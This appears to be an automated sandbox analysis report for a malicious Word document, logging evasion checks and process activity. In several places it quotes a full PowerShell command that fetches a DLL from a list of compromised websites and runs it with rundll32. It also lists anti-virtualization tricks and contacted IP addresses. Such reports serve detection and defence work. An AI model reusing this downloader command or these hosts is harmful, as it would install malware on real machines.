              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Tries to detect virtualization through RDTSC time measurementsShow sources
              Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000615A6672 second address: 00000000615A66A0 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-18h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007FF82C79A621h 0x0000000a mov edi, 0C2869DAh 0x0000000f rdtscp
              Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000615A8A23 second address: 00000000615A8A36 instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jnbe 00007FF82C79A43Eh 0x00000007 rdtscp
              Source: C:\Windows\System32\svchost.exe TID: 6456Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7048Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 896Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6512Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1260Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3738
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1230
              Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 4.0 %
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615A6620 rdtscp
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: powershell.exe, 00000005.00000003.312282002.0000000004F7A000.00000004.00000001.sdmpBinary or memory string: Hyper-V
              Source: powershell.exe, 00000005.00000002.340816682.0000000004A9A000.00000004.00000001.sdmpBinary or memory string: ,d:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
              Source: svchost.exe, 00000003.00000002.535889746.0000015127862000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
              Source: powershell.exe, 00000005.00000003.337043153.00000000078AD000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
              Source: svchost.exe, 00000003.00000002.533812198.0000015122029000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
              Source: svchost.exe, 00000006.00000002.533685658.0000020B61E67000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.533555344.0000023134829000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615CD1EE FindFirstFileExA,
              Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615A6620 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615A6510 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615B849D mov esi, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615C69AA mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615A8A50 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068DE10 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615B81F2 IsDebuggerPresent,OutputDebugStringW,
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615B83A7 GetProcessHeap,HeapAlloc,InterlockedPopEntrySList,VirtualAlloc,RaiseException,InterlockedPopEntrySList,VirtualFree,InterlockedPushEntrySList,
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615A6620 rdtscp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615B5239 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615B5ABD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615BED41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              System process connects to network (likely due to code injection or exploit)Show sources
              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.79.33.48 144
              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 168.197.250.14 80
              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 51.178.61.60 187
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191
              Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
              Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
              Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
